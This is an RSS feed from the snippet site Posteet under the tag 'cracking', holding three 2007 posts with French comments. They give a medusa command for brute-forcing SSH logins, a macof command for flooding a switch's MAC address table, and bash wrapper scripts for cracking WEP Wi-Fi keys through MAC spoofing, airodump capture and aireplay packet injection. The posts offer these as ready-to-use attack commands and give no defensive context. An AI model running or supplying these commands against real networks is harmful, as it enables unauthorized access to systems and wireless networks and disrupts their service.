<?xml version="1.0" encoding="UTF-8" ?>

<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
    <title>Posteet: cracking</title> 
    <link>http://www.posteet.com/</link> 
    <description>Recent posteets posted to Posteet</description>
    <ttl>60</ttl>

    
    <item>
        <title>bruteforce de login</title>
        <link>http://www.posteet.com/view/21</link>
        <description>
        <![CDATA[<pre>medusa -h 192.168.0.2 -U /home/user_list.txt -P /home/password_list.txt -M ssh
# tentatives de login type ssh sur 192.168.0.2 avec les users situés dans /home/user_list.txt et les mots de passe dans /home/password_list.txt
# liste des services possible à utiliser dans : /usr/lib/medusa/modules (sous Debian 4.0)</pre> <a href="http://www.posteet.com/tags/bruteforce">[bruteforce]</a>  <a href="http://www.posteet.com/tags/cracking">[cracking]</a>  <a href="http://www.posteet.com/tags/flood">[flood]</a> ]]>        </description>
        <dc:creator>neorom</dc:creator>
        <pubDate>Mon, 24 Sep 2007 07:00:49 +0000</pubDate>

            <category>bruteforce</category>
            <category>cracking</category>
            <category>flood</category>
    
    </item>

  
    <item>
        <title>flood table adresse mac</title>
        <link>http://www.posteet.com/view/17</link>
        <description>
        <![CDATA[<pre>macof -i eth1 -d 192.168.0.1
#-d : destination</pre> <a href="http://www.posteet.com/tags/cracking">[cracking]</a>  <a href="http://www.posteet.com/tags/flood">[flood]</a>  <a href="http://www.posteet.com/tags/mac">[mac]</a>  <a href="http://www.posteet.com/tags/reseau">[reseau]</a> ]]>        </description>
        <dc:creator>neorom</dc:creator>
        <pubDate>Mon, 24 Sep 2007 06:48:25 +0000</pubDate>

            <category>cracking</category>
            <category>flood</category>
            <category>mac</category>
            <category>reseau</category>
    
    </item>

  
    <item>
        <title>cracking wifi wep key</title>
        <link>http://www.posteet.com/view/12</link>
        <description>
        <![CDATA[<pre>#test si filtrage mac présent
#!/bin/bash
# $1= essid a attaquer
# $2= @ mac a attaquer
# $3= @ mac spoofee ou une au hasard
# $4= interface
if [ $# == 0 ]
then 
echo &quot; lancement par : &quot;
echo &quot; test-filtrage-mac.sh essid-a-attaquer @mac-a-attaquer @mac-spoofer interface&quot;
fi
if [ $# == 4 ] 
then
aireplay -1 10 -e $1 -a $2 -b $2 -h $3 $4
fi

#lancement scanner
#!/bin/bash
#$1 = interface
if [ $# == 0 ]
then
	echo &quot;lancement par &quot;
	echo &quot; lancement-scan.sh interface&quot;
fi
if [ $# == 1 ]
then
airmon-ng start $1
airodump-ng --write logs-scan $1
fi

#injection de pquets
#!/bin/bash
# $1= essid a attaquer
# $2= @ mac a attaquer
# $3= @ mac spoofee ou une au hasard
# $4= nb de paquets a send par sec, plus de paquet = plus de puissance 
# $5= interface
if [ $# == 0 ]
then 
echo &quot; lancement par : &quot;
echo &quot; test-filtrage-mac.sh essid-a-attaquer @mac-a-attaquer @mac-spoofer  nb-paquets-par-sec interface&quot;
fi
if [ $# == 5 ] 
then
aireplay -1 10 -e $1 -a $2 -b $2 -h $3 -x $4 -r logs-scan-01.cap $5
fi</pre> <a href="http://www.posteet.com/tags/cracking">[cracking]</a>  <a href="http://www.posteet.com/tags/wep">[wep]</a>  <a href="http://www.posteet.com/tags/wifi">[wifi]</a> ]]>        </description>
        <dc:creator>neorom</dc:creator>
        <pubDate>Sun, 23 Sep 2007 19:16:23 +0000</pubDate>

            <category>cracking</category>
            <category>wep</category>
            <category>wifi</category>
    
    </item>


</channel>
</rss>
